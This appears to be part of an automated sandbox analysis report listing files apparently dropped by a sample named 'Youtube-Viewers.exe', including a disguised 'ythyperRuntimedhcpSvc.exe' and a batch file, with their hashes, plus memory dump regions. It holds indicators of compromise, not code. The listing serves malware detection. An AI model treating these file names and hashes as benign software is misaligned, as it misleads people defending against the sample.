C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\95567c26-48ca-4301-9648-775262d0d918\index-dir\the-real-index

Filesize
2KB

MD5
84d5cb76c164843b9485a8138823b3af

SHA1
43423ad8f83119054a388760a8028906603834c7

SHA256
83ead74bdbe0ebd356a9ffdeb72959e320bd6ae0629da2a442897e37b9e3d9ef

SHA512
803839fc5554bd647eea2072cf6bdc26d12508de957a2309aa5f64229fb4ffdc4594f4fcdf6453309c12fc2113fc7209d369660f659aa749e4cb72066ee135ac

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\f552c0ab-c4ea-45c3-b8ab-595d7c34934c\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
114B

MD5
1b64062782ea5d8c040d0f43fb38aff7

SHA1
6a51128a3e4251c2a13697ab2ccc645e028a1f81

SHA256
da7df36831bc3020716285f429e74f3c6444beefbaf345a1fe26b4fa5ebde44d

SHA512
8b92325552e3b5809c632b3baa204c295cbc5faa15652866b356e9f023d82338cd224cd98e05016e2d7443068f4e04e894905ba995ae37316b3997931b32d7f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
176B

MD5
5ab76146212482a71b3285c41ae0b7b9

SHA1
650d069b437e3fc47d462680f55588f74c751aca

SHA256
2c559fcdb8d6cd1b83eb77950bf14981478b5d0a5248b0d398ec1a94dc62cba0

SHA512
7a9a471fdeb887bc6530756070be8cefd4f03c93b3bbe7124f84536f7651bb5141a403a50302f47451a667c09d810b6d01fae9c02ca13692740cd2f243655b06

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
187B

MD5
c4124d1533b43b2c6768655b178e5235

SHA1
e0041db6d1f6aab91562b01a4443610140d2651a

SHA256
4babc8439de0a18cb058a6843eb3f21d37d45cf9d408d55cea2ce4ea4ff936da

SHA512
b5cc74ae07deb4530baee5307567678b24c8155b04ee69307365bbaee0a51f66318318d8b09a56e7ae67ba794db5e5d085bc1814e7f0e2eb38b726fcd9a4be64

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
178B

MD5
43df3e592b44bf7de669db0b45c7b934

SHA1
377eb99223e7d9858e59b4e2d0c61618cdfb0732

SHA256
2adc3b05eef9dc2894cb0b462fb1b00c59976aab5e3e963bfe739d56e6526a1e

SHA512
3dc7c4b537ef79f7d6bafae1ce0a995f494d0991c305339c779ae5e56ae0a8b847d71b7dd673ff7e742bff42a31b2d16ff04410d7ad61f8f96693ed6a63d0fec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
112B

MD5
e9060e8dfdde31dbcf7e3d7ed077da1b

SHA1
f3b75381702e39b3c7ce8be056b4f964d8be9f02

SHA256
8d09ec62e275cad9333af88a94a3c42fe3fa805f8c11d68c8ef8d5fcd3c8ae38

SHA512
6aa5a2892b8fad11fb406b6ef93c07946d8cce3759fd4f8ea5b561850a0fa4f08f2e81736ef19472ab99cffa0f20d5cf69e1b66659cc6cda96179ca481ab8cde

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000002.dbtmp

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Shortcuts Menu Icons\Monochrome\1\512.png

Filesize
10KB

MD5
7f57c509f12aaae2c269646db7fde6e8

SHA1
969d8c0e3d9140f843f36ccf2974b112ad7afc07

SHA256
1d5c9f67fe93f9fcc1a1b61ebc35bda8f98f1261e5005ae37af71f42aab1d90f

SHA512
3503a0f4939bed9e1fd5e086b17d6de1063220dffdab2d2373aa9582a2454a9d8f18c1be74442f4e597bdba796d2d69220bd9e6be632a15367225b804187ea18

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir1744_1568645264\Shortcuts Menu Icons\0\512.png

Filesize
2KB

MD5
12a429f9782bcff446dc1089b68d44ee

SHA1
e41e5a1a4f2950a7f2da8be77ca26a66da7093b9

SHA256
e1d7407b07c40b5436d78db1077a16fbf75d49e32f3cbd01187b5eaaa10f1e37

SHA512
1da99c5278a589972a1d711d694890f4fd4ec4e56f83781ab9dee91ba99530a7f90d969588fa24dce24b094a28bdecbea80328cee862031a8b289f3e4f38ce7a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
266KB

MD5
815fa6b48cd50c5dac5de28fecdb0f7a

SHA1
3372db6057728ea3348328e826a9f52cfbebab6b

SHA256
835180d4652849b9d96651b3102432fa44fe733404d6fb0d9c2aa54316135b2f

SHA512
7fc705d96ef2f8c409111f52eb61842a84c9aeec724d9d122f55fca79e29c196fce37f34bf9d5d7d6b4970d1b0c18eb03d508b283815fd646510eae1bcf1391d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\eac92b11-8668-4536-808b-fe8619df5be8.tmp

Filesize
266KB

MD5
81d6207fd16d068624d7202c8a89d23f

SHA1
d6116d5b7bb3ff70fc1d6bc9fe545f72e9b2528a

SHA256
079676f3efbfc150302f96f873b8d1b19e2a09b0f499fea66573eb3213f1cd9a

SHA512
4f76f5a02ee09e4f35c2a353438cf5f5c71cfc9cc5b669db5e2a44cef98546d81dd678d2df2883f3d8a6383c623aabe801ad6fe02f8d5b73b7905c872594796a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab39D7.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3AE7.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe.config

Filesize
184B

MD5
cc46a0995713ba7cb577b4bbbedf83e8

SHA1
6cc50a0e444e33f65d42423195ed045a3a55daf8

SHA256
5fe1ad802f68d7c47dbbd8e60162ba88abaed162da5d381c85d3e4935311962e

SHA512
36f5b3acbc520504cfe56e5fe19de2a22ae3d2ddddb4c0eb3e441f884033077fb411e69976c3e250c3ef01189d0e48016bde67a73a0dbc950dd5d8ec7783fd2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\c37npxJojj.bat

Filesize
248B

MD5
b7a17a9fee375f6ce3410d95fbbdf4c1

SHA1
a8dd154b5b4ec32b17853762fb28e74db8bd8bc2

SHA256
55bbb1807668fff44f0f932555f982d2da888196918097278a870eb2f6a7b8fe

SHA512
eb9277d49e42e2cf811e1462d1414a8ab881ddd2571747cc0d70ce915d88e1c7894d82acb07c1d9e39adff1fee31753133767c966522fe756a7a24b87af1792f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
94d97fa6f236816bac95a62e15a5a712

SHA1
5bd559fe47027de941b0419b15afb97fca497877

SHA256
d0e37439452687e82e737b181cb3835097b78bd913d0593f6abc37d6fd013066

SHA512
8b5f4f02f1ff53cd6dba0994b24e262361f9b94cb2f314b719622e65b39eef27318db4454ca3b311536d956a6994492012b2cc2121ad7a800893ae40d5e08035

Download Submit
\ChainReview\ythyperRuntimedhcpSvc.exe

Filesize
2.0MB

MD5
9a6a6606ac872363a585b773f71d8f80

SHA1
62ea36005c549612d2402ab5d04f236ceca5f879

SHA256
d647eff6ef8a4eb95d66b2d86907b873e68199a5ad59ce091c9eefe9b26f9485

SHA512
616953d5386084eb926a445266e061c662a65ac64929085fdd237ee2bfeb19ee1fb879c84dbe11bd382c9f1f4aa54811736ffba6ff28aa6f2ef96cec41c9b038

Download Submit
\Users\Admin\AppData\Local\Temp\Leaf.xNet.dll

Filesize
129KB

MD5
ea87f37e78fb9af4bf805f6e958f68f4

SHA1
89662fed195d7b9d65ab7ba8605a3cd953f2b06a

SHA256
de9aea105f31f3541cbc5c460b0160d0689a2872d80748ca1456e6e223f0a4aa

SHA512
c56bd03142258c6dcb712d1352d2548a055fbb726ee200949d847cb2d23d9c52442b1435be0df0bf355701a2c1a3c47cd05b96972501f457d2d401501d33d83a

Download Submit
\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe

Filesize
33KB

MD5
a7878575f2e9f431c354c17a3e768fd9

SHA1
1824b6cb94120af47a0540af88bfc51435a4c20d

SHA256
375552e53a0c25aa36cd66827b97f7576177d1fa81efd978a55b2ec93a5b5fdd

SHA512
4f9de23fc13f414c8d6c82a7cd9ef5dfa2e7855ba642b745f62ad8b4af8dccd9269b4dec5468632af0ff5353b0d4c8e85f758ea794469f355f762cb1cc747019

Download Submit
\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe

Filesize
2.3MB

MD5
e99c78add813e602c300b492534ec0f7

SHA1
6fda2be6b06481e4284c6d38edc301d3a52d5a46

SHA256
fd58d5efc6e9d179c8419a154ecbdff007171e44ac1076bb075d50d208807d9e

SHA512
1dbe6f226aa2f0bd2f59852387a7ffacfbc18a3fb5fa5debe5106d1f91b5bde042bb070ccd34a471a56542ee76f16ac781dcc569999008ae81c5f8e2ffe65b9e

Download Submit
memory/320-1154-0x0000000000DE0000-0x0000000000FE6000-memory.dmp

Filesize
2.0MB

Download
memory/836-1158-0x0000000001350000-0x0000000001556000-memory.dmp

Filesize
2.0MB

Download
memory/880-199-0x0000000000AF0000-0x0000000000CF6000-memory.dmp

Filesize
2.0MB

Download
memory/908-1130-0x0000000000D10000-0x0000000000F16000-memory.dmp

Filesize
2.0MB

Download
memory/1516-1146-0x0000000000010000-0x0000000000216000-memory.dmp

Filesize
2.0MB

Download
memory/1580-1150-0x0000000001030000-0x0000000001236000-memory.dmp

Filesize
2.0MB

Download
memory/1600-1134-0x0000000001370000-0x0000000001576000-memory.dmp

Filesize
2.0MB

Download
memory/1612-1159-0x0000000000AD0000-0x0000000000CD6000-memory.dmp

Filesize
2.0MB

Download
memory/1624-171-0x0000000001240000-0x0000000001446000-memory.dmp

Filesize
2.0MB

Download
memory/1684-163-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/1728-1149-0x0000000000200000-0x0000000000406000-memory.dmp

Filesize
2.0MB

Download
memory/1780-1156-0x00000000009F0000-0x0000000000BF6000-memory.dmp

Filesize
2.0MB

Download
memory/1796-1160-0x0000000000D80000-0x0000000000F86000-memory.dmp

Filesize
2.0MB

Download
memory/1952-1141-0x00000000001B0000-0x00000000003B6000-memory.dmp

Filesize
2.0MB

Download
memory/2320-1138-0x00000000000A0000-0x00000000002A6000-memory.dmp

Filesize
2.0MB

Download
memory/2392-161-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download
memory/2416-1144-0x0000000000EC0000-0x00000000010C6000-memory.dmp

Filesize
2.0MB

Download
memory/2504-1157-0x0000000000330000-0x0000000000536000-memory.dmp

Filesize
2.0MB

Download
memory/2708-119-0x0000000000520000-0x000000000052E000-memory.dmp

Filesize
56KB

Download
memory/2708-115-0x0000000000540000-0x000000000055C000-memory.dmp

Filesize
112KB

Download
memory/2708-127-0x0000000000740000-0x000000000074C000-memory.dmp

Filesize
48KB

Download
memory/2708-125-0x0000000000730000-0x000000000073E000-memory.dmp

Filesize
56KB

Download
memory/2708-123-0x0000000000580000-0x000000000058C000-memory.dmp

Filesize
48KB

Download
memory/2708-111-0x0000000000A80000-0x0000000000C86000-memory.dmp

Filesize
2.0MB

Download
memory/2708-113-0x0000000000500000-0x000000000050E000-memory.dmp

Filesize
56KB

Download
memory/2708-121-0x0000000000530000-0x000000000053E000-memory.dmp

Filesize
56KB

Download
memory/2708-117-0x0000000000560000-0x0000000000578000-memory.dmp

Filesize
96KB

Download
memory/2792-98-0x0000000001140000-0x000000000114E000-memory.dmp

Filesize
56KB

Download
memory/2792-103-0x0000000000310000-0x0000000000336000-memory.dmp

Filesize
152KB

Download
memory/3008-3-0x0000000000400000-0x0000000000DDC000-memory.dmp

Filesize
9.9MB

Download
memory/3008-4-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

Filesize
3.8MB

Download
memory/3008-0-0x0000000000400000-0x0000000000DDC000-memory.dmp

Filesize
9.9MB

Download
memory/3008-1-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

Filesize
3.8MB

Download